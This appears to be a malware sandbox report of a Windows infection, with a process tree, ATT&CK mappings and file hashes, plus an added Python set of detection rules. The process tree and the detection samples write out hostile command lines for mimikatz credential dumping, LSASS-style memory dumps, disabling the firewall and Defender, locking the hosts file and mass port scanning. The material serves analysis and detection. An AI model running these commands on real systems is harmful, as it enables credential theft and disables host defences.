        C:\Windows\SysWOW64\cmd.exe (level 3, PID 3672)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (level 3, PID 1440)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 5340)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (level 3, PID 456)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

C:\Windows\SysWOW64\fkjvgk.exe (level 1, PID 3620)
    cmdline: C:\Windows\SysWOW64\fkjvgk.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

(The remaining level-1 trees are the per-minute SYSTEM scheduled tasks ltspunbjs, apybablby and igbsawatu firing.)

C:\Windows\system32\cmd.EXE (level 1, PID 4144)
    cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe
    C:\Windows\ime\euikgtl.exe (level 2, PID 3444)
        cmdline: C:\Windows\ime\euikgtl.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE (level 1, PID 2280)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F
    C:\Windows\system32\cmd.exe (level 2, PID 3460)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe (level 2, PID 2752)
        cmdline: cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F

C:\Windows\system32\cmd.EXE (level 1, PID 2616)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F
    C:\Windows\system32\cmd.exe (level 2, PID 872)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe (level 2, PID 2436)
        cmdline: cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F

C:\Windows\system32\cmd.EXE (level 1, PID 5224)
    cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe
    C:\Windows\ime\euikgtl.exe (level 2, PID 232)
        cmdline: C:\Windows\ime\euikgtl.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE (level 1, PID 3492)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F
    C:\Windows\system32\cmd.exe (level 2, PID 6140)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe (level 2, PID 5556)
        cmdline: cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F

C:\Windows\system32\cmd.EXE (level 1, PID 4308)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F
    C:\Windows\system32\cmd.exe (level 2, PID 4132)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe (level 2, PID 2848)
        cmdline: cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F
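The file names in this tree are randomised (euikgtl.exe, jgqtbilab.exe, vfshost.exe, bqalurljg.exe, nstjgbafp.exe), but the command lines are not: ProcDump-style `-accepteula -mp <pid> <pid>.dmp` against 17 processes, mimikatz module syntax (`privilege::debug sekurlsa::logonpasswords`), `cacls` denying users, administrators and SYSTEM on the hosts file, a `netsh ipsec static` policy that blocks 135/139/445, the firewall, Defender and Windows Update stopped and set to disabled, per-minute SYSTEM scheduled tasks, a masscan-style `-p 80 <range> --rate=` sweep and dropped binaries made world-writable with `everyone:F`. The Python below is an added example, not part of the sandbox output: it encodes those command-line shapes as process-creation rules and runs them over records constructed from the process tree above. The `ProcEvent` fields (pid, image, cmdline) are an assumed minimal schema, not any product's log format, and the rule names and technique IDs are the editor's mapping.

```python
"""Process-creation detection rules for the command-line tradecraft in this report.

Added example, not part of the sandbox output. The event records below are
constructed from the process tree in the report; the (pid, image, cmdline)
schema is an assumption, not a specific product's log format.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str


# (rule name, ATT&CK technique, pattern searched over the full command line)
RULES = [
    ("procdump_style_minidump", "T1003.001",
     re.compile(r"-accepteula\s+-mp\s+\d+\s+\S+\.dmp", re.I)),
    ("mimikatz_module_syntax", "T1003.001",
     re.compile(r"privilege::debug|sekurlsa::logonpasswords", re.I)),
    ("hosts_file_acl_denial", "T1562.001",
     re.compile(r"cacls\s+\S*drivers\\etc\\hosts\s+.*?/D\s+(?:users|administrators|SYSTEM)", re.I)),
    ("ipsec_static_policy_change", "T1562.004",
     re.compile(r"netsh\s+ipsec\s+static\s+(?:add|set|del)\b", re.I)),
    ("host_firewall_disabled", "T1562.004",
     re.compile(r"netsh\s+(?:advfirewall\s+set\s+allprofiles\s+state\s+off"
                r"|firewall\s+set\s+opmode\s+mode=disable)", re.I)),
    ("security_service_stopped_or_disabled", "T1562.001",
     re.compile(r"(?:sc\s+config|net1?\s+stop)\s+(?:MpsSvc|WinDefend|SharedAccess|wuauserv)\b", re.I)),
    ("system_task_every_minute", "T1053.005",
     re.compile(r"schtasks\s+/create\b.*?/sc\s+minute\s+/mo\s+1\b.*?/ru\s+system\b", re.I)),
    ("masscan_style_range_sweep", "T1046",
     re.compile(r"-p\s+\d+\s+\d{1,3}(?:\.\d{1,3}){3}-\d{1,3}(?:\.\d{1,3}){3}\s+--rate=\d+", re.I)),
    ("dropped_exe_made_world_writable", "T1222.001",
     re.compile(r"cacls\s+\S+\.exe\s+/p\s+everyone:F\b", re.I)),
]

# Constructed from the report's process tree (PIDs and command lines as shown there),
# plus one benign ping that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(1856, r"C:\Windows\TEMP\lubbeisit\jgqtbilab.exe",
              r"C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 776 C:\Windows\TEMP\lubbeisit\776.dmp"),
    ProcEvent(2552, r"C:\Windows\lubbeisit\Corporate\vfshost.exe",
              r"C:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit"),
    ProcEvent(3160, r"C:\Windows\SysWOW64\cacls.exe",
              r"cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM"),
    ProcEvent(2456, r"C:\Windows\SysWOW64\netsh.exe",
              "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP"),
    ProcEvent(2672, r"C:\Windows\SysWOW64\netsh.exe", "netsh Advfirewall set allprofiles state off"),
    ProcEvent(2832, r"C:\Windows\SysWOW64\sc.exe", "sc config WinDefend start= disabled"),
    ProcEvent(4496, r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"'),
    ProcEvent(4032, r"C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe",
              r"C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt"),
    ProcEvent(2752, r"C:\Windows\system32\cacls.exe",
              r"cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"),
    ProcEvent(3032, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1 -n 5"),  # benign control
]


def match_rules(events: List[ProcEvent]) -> Dict[str, List[int]]:
    """Return {rule name: [pids whose command line matched]}, rules in RULES order of first hit."""
    hits: Dict[str, List[int]] = {}
    for ev in events:
        for name, _technique, pattern in RULES:
            if pattern.search(ev.cmdline):
                hits.setdefault(name, []).append(ev.pid)
    return hits


def techniques_observed(events: List[ProcEvent]) -> List[str]:
    """Sorted, de-duplicated ATT&CK technique IDs for every rule that fired."""
    fired = set(match_rules(events))
    return sorted({tech for name, tech, _ in RULES if name in fired})


def is_credential_theft_with_evasion(events: List[ProcEvent]) -> bool:
    """The combination seen in this report: credential dumping (T1003.*) together
    with defence impairment (T1562.*) in one host's events. Either family alone
    has benign look-alikes; both together in one tree do not."""
    techs = techniques_observed(events)
    return any(t.startswith("T1003") for t in techs) and any(t.startswith("T1562") for t in techs)


if __name__ == "__main__":
    for name, pids in match_rules(SAMPLE_EVENTS).items():
        print(f"{name}: PIDs {pids}")
    print("techniques:", techniques_observed(SAMPLE_EVENTS))
    print("credential theft + defence impairment:", is_credential_theft_with_evasion(SAMPLE_EVENTS))
```

The correlation in `is_credential_theft_with_evasion` is the useful alert; `netsh ipsec static` and `sc config ... start= disabled` both occur in legitimate administration, so the individual rules are better as enrichment than as pages. Extend the service list to whatever EDR or AV service names run in your estate, and feed the rules from a real process-creation source (Sysmon event 1 or Security event 4688 with command-line auditing on) rather than the constructed records here.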
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads
-
Filesize: 95KB
MD5: 86316be34481c1ed5b792169312673fd
SHA1: 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256: 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512: 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize: 275KB
MD5: 4633b298d57014627831ccac89a2c50b
SHA1: e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256: b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512: 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize: 26.2MB
MD5: 48833d2a45c5d768d863c3b68e010bed
SHA1: d0e26a7817dc823ffeeaef4992988718dd22b826
SHA256: cf50bac521859d95faf30ca92a795e864ae63ffc3f81468075764d584f1a7a99
SHA512: 5b4b2fb0ebcfcf7fa54c0272213c10ff50ee214ed601f181da0890467eb450e38e4dd22932b537eaa670279fab92fd8af3481f93d75461101248aad7fca5b6c6
-
Filesize: 4.1MB
MD5: d3480d7b88aec6614dd0f62deba67da3
SHA1: 885eb6fa8d593d44747cba8decccb18647a185fc
SHA256: 7d8c94472b77a20c20e0810649e0b0e1098ed409afe6f7a0ce12c7accf390dd2
SHA512: d741c548e18f9895ac6a847d5819879af7dafc9b64cb64e479e50bc065e2cd74fc6f44d68ec56c1a2605188f28e02a2fbbf7b6352eeb9beecf28c26224a3678e
-
Filesize: 3.6MB
MD5: bef10ce15cad62e4e1425f942703150b
SHA1: 25e9e498e6cb59dfeba593439c8de45de716470d
SHA256: 90fa194c43ffca60d964e11e3d24b86251052e758e6fbf9101e4a01086cfaa1c
SHA512: 8d0b02bba183b19b21c639478738c29bfedb8425b69de545eaa3497df9fdb4ca8418f0001d93e3057027050a880725d5f887c3231378f25708bd045673a2334f
-
Filesize: 8.6MB
MD5: 7df3eeee275f4bfe8b2ffa87eb6c30cc
SHA1: ba197b9745a4f94f9305c49bb8120d3f80deb48f
SHA256: e8f705a45bb0608b3cbbc14cd062af12330d8af33029667edc74c0d315fdb8fc
SHA512: c358273ae6b1eb76f7810ee148a961edbf530f26f4bc5b60927e91bacc6d552f4fd28aa204b766c8ef3dc24ed3b454f69438a1f13d0969d686078f6d424f2686
-
Filesize: 7.5MB
MD5: e19628ea82dd4332ad216bb147c9fc40
SHA1: f4d6ef365b8bfc0dbffdd5106ef311906d542656
SHA256: f11066a46639f93571f9cf31946809b8e2c661add7a7ecd022583e91077330c7
SHA512: 673f5307a6bc142350d1c3ed3711e0a5f80e1c2e9a25710f703dc7497c95e75e07d5a73efd7cf0e61f5afc3e679a005a5c6fe44c952490ea90ba678bd7bc6616
-
Filesize: 45.5MB
MD5: a181fa5f01a10430c394a7b7e35bf7b5
SHA1: f0b477e2051dffaa430d77741c71d73c47f1910a
SHA256: 7826ea2dfbb72eeb22003d1cefccb1716d34121a6d2e48db1132896a90791bec
SHA512: 20febf7858a205caf2159d70176e2fb4e2dfdee2693725926cffc27855bfa056af43848fa41b4ea7913fd167d513e9406712f21614f0635c67aef828448ac828
-
Filesize: 2.9MB
MD5: 31269450968842071685941fd09785b1
SHA1: 462428309f0592270e585b6cb1c5a03c5b8cacff
SHA256: acc470f988561a042e43db642a88079f1a015ae1596b087521518453d465a199
SHA512: d57e7799347bd5a36abc3772e3ac594e84d3f2ac106b2484d3c0dfe18138045cc22cdb44e1c7dda594363404b6208d873b1014bfaae6437bfe9da793b0e8cbff
-
Filesize: 1.5MB
MD5: 74727b9822e4b2eabd23a6648233dced
SHA1: 5d5368eb272ef1b7b95e0e86fd51d5ddfd0a6037
SHA256: 7ea8de7a9dfb38e4868e1cee344b8a5b171677fbfe881ab7e589f833c935e885
SHA512: 856f19683e8c1ed7037db74d3be395b9e991c8bcf518e77cbdeeab6b5b4ec9f503720e40a19fc3804c5a72bdd48b0ec279d9204caaf93cdca6d3f58e74db2ddd
-
Filesize: 810KB
MD5: a50afda9463d801eab4a900b73bcc965
SHA1: d376be318688593beb17aa413febe55d4f377fcb
SHA256: 4de27f152e90ebc0f16dbdfc6ec79349b0c32dc778497f1f6b8bd1b5f0c45cae
SHA512: 50038a6b3b98456944a108cc70eb4094afa2b233057b4469c8dc386995f62985680c18f5ea7a8151744f3201575ccc3d2cd2f26d317eb28d7dd81cd26c03bf53
-
Filesize: 2.1MB
MD5: 1f85e42a957926a7fae2c22c556f19e5
SHA1: 2953dfa6df74770db8ae46e51c7bb95f5d5750df
SHA256: d615d4fb2f3138dd485ceb1ff155ba2aa590ba2a65faf6fa0c90fb0681a7be0b
SHA512: dc9c50091434931f51be9bad33e6fe7f33310ac9eb614b13722cce7e01994bd862c809412862860c3f6de7267077bbe609e2e912a9df56d7ab805e6c5a8c509b
-
Filesize: 20.5MB
MD5: 0cfaca8d58e96aa0eb10827a9aa8075d
SHA1: ef8a2a597b8dcebaec2a3ac2102c948f4997d780
SHA256: e60e15cbda518e4dedb5d5d08baad0b610068ebe543566856594f1efd724b2c6
SHA512: 666edf1aebdec64ac30bc5ffa8330b87c532fd1348b4f0ce5b92872cbe624520ed22894bc4e276a34864fbc15a67f20723017081235836a7e4263f7ca4447660
-
Filesize: 4.4MB
MD5: 0f1470af4c42443fcf3f67cace4ba7a7
SHA1: 8f520d2297a863794b6fc946c040b19f11d96036
SHA256: 2ad1872f49cb09526ab56493de6984a6999986eab57604e364b80a2d8acdeb52
SHA512: 5fd979b8cd83d686f4505a427799db70f572044e191de6eedb2660d22f3cf3b5e0b975b8c51b7ca0ed5f5f37dca743b888e0fda9fad486291b2cb3dc9ad07788
-
Filesize: 1.2MB
MD5: 967ce65eddb11f5e238e41dcb5ad5806
SHA1: d09d8045383e97c03e1299a6c7eca2ee177e4773
SHA256: 090164babbcf9ffb28ab15fb44054ee3cf4a3976f0325f47f99348c4a3fa0787
SHA512: 52b8515ee158b588cef635e3f8851f1d22a2c11f0d072cc38f5c4affcd581f089e510393212e4ca1799a9cfc60a2cea0ba1b5bf4fddd7b55b3e42d86046546c9
-
Filesize: 33.3MB
MD5: 62ac367b9e87d3cc60da5eb670796d99
SHA1: 4fabbd004f0a1a56415329f11c136f3a508ce2ea
SHA256: 0d4a50bbb27881be269d241929a262cf58ffae29e65d376e72e6120bd93ab7e2
SHA512: 5b8db753b93f28235b960d86d6d33c1b254c8ebeea69316b0c9423589d2ef902c462c27014d88c1ee655e393acd798559585a3ec2ecf54a51c271b5ac5c76068
-
Filesize: 1019KB
MD5: 2e5f94c66807242b752a9f5356397d8c
SHA1: 8dfafa8298ad914624fb71fa88ac542d51dbee2e
SHA256: b18e6a3dfa17365201333c008841e694a4cb0fac4c28db199939dc7ea70c2b70
SHA512: b200866349fe8ccf63f5dde7c6bc980e763f98ada8076a98091ba78901e4f0a439513f3a115fa142f97dcd4cf6c0c8b21003a5a8c315da3336e6a59e310a4a38
-
Filesize: 693B
MD5: f2d396833af4aea7b9afde89593ca56e
SHA1: 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256: d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512: 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize: 126KB
MD5: e8d45731654929413d79b3818d6a5011
SHA1: 23579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256: a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512: df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize: 11KB
MD5: 2ae993a2ffec0c137eb51c8832691bcb
SHA1: 98e0b37b7c14890f8a599f35678af5e9435906e1
SHA256: 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA512: 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize: 6KB
MD5: b648c78981c02c434d6a04d4422a6198
SHA1: 74d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA256: 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512: 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize: 343KB
MD5: 2b4ac7b362261cb3f6f9583751708064
SHA1: b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256: a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512: c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize: 72KB
MD5: cbefa7108d0cf4186cdf3a82d6db80cd
SHA1: 73aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA256: 7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512: b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize: 8.7MB
MD5: 63ba92c4f8f210f6492693a5b893f301
SHA1: 3c5c85c22f14cc55814a07efffe1f2b1114e56fd
SHA256: f04009cb678580f3d2719f43c1325ad89fceb2786bcf51499f1d7101a04f0fd0
SHA512: 83c8fa61b1aa9a6cc483d0168f21f9a5e0701ef9c584c08205c9228281c2c577fb6a5fa9c7b0957d29bebd0b185b10c275461a47c7cea32d48475a69f11a9e2b
-
Filesize: 381KB
MD5: fd5efccde59e94eec8bb2735aa577b2b
SHA1: 51aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256: 441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA512: 74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize: 332KB
MD5: ea774c81fe7b5d9708caa278cf3f3c68
SHA1: fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA256: 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA512: 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize: 424KB
MD5: e9c001647c67e12666f27f9984778ad6
SHA1: 51961af0a52a2cc3ff2c4149f8d7011490051977
SHA256: 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA512: 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize: 1KB
MD5: c838e174298c403c2bbdf3cb4bdbb597
SHA1: 70eeb7dfad9488f14351415800e67454e2b4b95b
SHA256: 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512: c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376